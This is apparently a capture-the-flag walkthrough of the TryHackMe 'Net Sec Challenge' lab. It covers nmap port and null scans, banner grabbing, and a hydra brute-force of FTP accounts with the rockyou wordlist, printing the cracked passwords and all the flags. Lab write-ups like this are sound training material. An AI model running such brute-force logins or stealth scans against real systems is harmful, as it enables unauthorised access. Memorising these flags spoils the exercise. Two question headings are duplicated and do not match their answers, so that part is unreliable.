Net Sec Challenge
- ๐ Website: TryHackMe
- ๐ฅ Level: Medium
- ๐ฅ๏ธ OS: N/D
- ๐ Link: Net Sec Challenge
โQuestion¶
What is the highest port number being open less than 10,000?
๐ Walkthrough¶
root@ip-10-10-248-63:~# nmap -p- 10.10.131.183
Starting Nmap 7.80 ( https://nmap.org ) at 2025-10-29 15:03 GMT
mass_dns: warning: Unable to open /etc/resolv.conf. Try using --system-dns or specify valid servers with --dns-servers
mass_dns: warning: Unable to determine any DNS servers. Reverse DNS is disabled. Try using --system-dns or specify valid servers with --dns-servers
Nmap scan report for 10.10.131.183
Host is up (0.0030s latency).
Not shown: 65529 closed ports
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
139/tcp open netbios-ssn
445/tcp open microsoft-ds
8080/tcp open http-proxy
10021/tcp open unknown
MAC Address: 02:3F:DC:8C:F5:63 (Unknown)
Nmap done: 1 IP address (1 host up) scanned in 3.98 seconds
Answer
8080
โQuestion¶
There is an open port outside the common 1000 ports; it is above 10,000. What is it?
๐ Walkthrough¶
From the output above
Answer
10021
โQuestion¶
There is an open port outside the common 1000 ports; it is above 10,000. What is it?
๐ Walkthrough¶
From the output above
Answer
6
โQuestion¶
There is an open port outside the common 1000 ports; it is above 10,000. What is it?
๐ Walkthrough¶
root@ip-10-10-248-63:~# curl -v 10.10.131.183
* Trying 10.10.131.183:80...
* TCP_NODELAY set
* Connected to 10.10.131.183 (10.10.131.183) port 80 (#0)
> GET / HTTP/1.1
> Host: 10.10.131.183
> User-Agent: curl/7.68.0
> Accept: */*
>
* Mark bundle as not supporting multiuse
< HTTP/1.1 200 OK
< Vary: Accept-Encoding
< Content-Type: text/html
< Accept-Ranges: bytes
< ETag: "229449419"
< Last-Modified: Tue, 14 Sep 2021 07:33:09 GMT
< Content-Length: 226
< Date: Wed, 29 Oct 2025 15:06:01 GMT
< Server: lighttpd THM{***}
<
<!DOCTYPE html>
<html lang="en">
<head>
<title>Hello, world!</title>
<meta charset="UTF-8" />
<meta name="viewport" content="width=device-width,initial-scale=1" />
</head>
<body>
<h1>Hello, world!</h1>
</body>
</html>
* Connection #0 to host 10.10.131.183 left intact
Answer
THM{web_server_25352}
โQuestion¶
What is the flag hidden in the SSH server header?
๐ Walkthrough¶
root@ip-10-10-248-63:~# telnet 10.10.131.183 22
Trying 10.10.131.183...
Connected to 10.10.131.183.
Escape character is '^]'.
SSH-2.0-OpenSSH_8.2p1 THM{***}
Answer
THM{946219583339}
โQuestion¶
We have an FTP server listening on a nonstandard port. What is the version of the FTP server?
๐ Walkthrough¶
root@ip-10-10-248-63:~# telnet 10.10.131.183 10021
Trying 10.10.131.183...
Connected to 10.10.131.183.
Escape character is '^]'.
220 (***)
Answer
vsFTPd 3.0.5
โQuestion¶
We learned two usernames using social engineering: eddie and quinn. What is the flag hidden in one of these two account files and accessible via FTP?
๐ Walkthrough¶
Let's crack using rockyou.txt
root@ip-10-10-248-63:~# echo "eddie">users.txt
root@ip-10-10-248-63:~# echo "quinn">>users.txt
root@ip-10-10-248-63:~# hydra -L users.txt -P /usr/share/wordlists/rockyou.txt ftp://10.10.131.183:10021
Hydra v9.0 (c) 2019 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2025-10-29 15:13:14
[DATA] max 16 tasks per 1 server, overall 16 tasks, 28688796 login tries (l:2/p:14344398), ~1793050 tries per task
[DATA] attacking ftp://10.10.131.183:10021/
[10021][ftp] host: 10.10.131.183 login: eddie password: jordan
[10021][ftp] host: 10.10.131.183 login: quinn password: andrea
1 of 1 target successfully completed, 2 valid passwords found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2025-10-29 15:13:45
root@ip-10-10-248-63:~#
eddie:jordan. root@ip-10-10-248-63:~# ftp 10.10.131.183 10021
Connected to 10.10.131.183.
220 (vsFTPd 3.0.5)
Name (10.10.131.183:root): eddie
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
226 Directory send OK.
ftp>
quinn:andrea. root@ip-10-10-248-63:~# ftp 10.10.131.183 10021
Connected to 10.10.131.183.
220 (vsFTPd 3.0.5)
Name (10.10.131.183:root): quinn
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> dir
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
-rw-rw-r-- 1 1002 1002 18 Sep 20 2021 ftp_flag.txt
226 Directory send OK.
ftp> get ftp_flag.txt
local: ftp_flag.txt remote: ftp_flag.txt
200 PORT command successful. Consider using PASV.
150 Opening BINARY mode data connection for ftp_flag.txt (18 bytes).
226 Transfer complete.
18 bytes received in 0.00 secs (27.6386 kB/s)
ftp> quit
221 Goodbye.
root@ip-10-10-248-63:~# cat ftp_flag.txt
THM{***}
root@ip-10-10-248-63:~#
Answer
THM{321452667098}
โQuestion¶
Browsing to http://10.10.131.183:8080 displays a small challenge that will give you a flag once you solve it. What is the flag?
๐ Walkthrough¶
Let's land on the website.
We have to do a sneaky port scan. Let's use a Null Scan
root@ip-10-10-248-63:~# nmap -sN 10.10.131.183
Starting Nmap 7.80 ( https://nmap.org ) at 2025-10-29 15:18 GMT
mass_dns: warning: Unable to open /etc/resolv.conf. Try using --system-dns or specify valid servers with --dns-servers
mass_dns: warning: Unable to determine any DNS servers. Reverse DNS is disabled. Try using --system-dns or specify valid servers with --dns-servers
Nmap scan report for 10.10.131.183
Host is up (0.0025s latency).
Not shown: 995 closed ports
PORT STATE SERVICE
22/tcp open|filtered ssh
80/tcp open|filtered http
139/tcp open|filtered netbios-ssn
445/tcp open|filtered microsoft-ds
8080/tcp open|filtered http-proxy
MAC Address: 02:3F:DC:8C:F5:63 (Unknown)
Nmap done: 1 IP address (1 host up) scanned in 1.39 seconds
Answer
THM{f7443f99}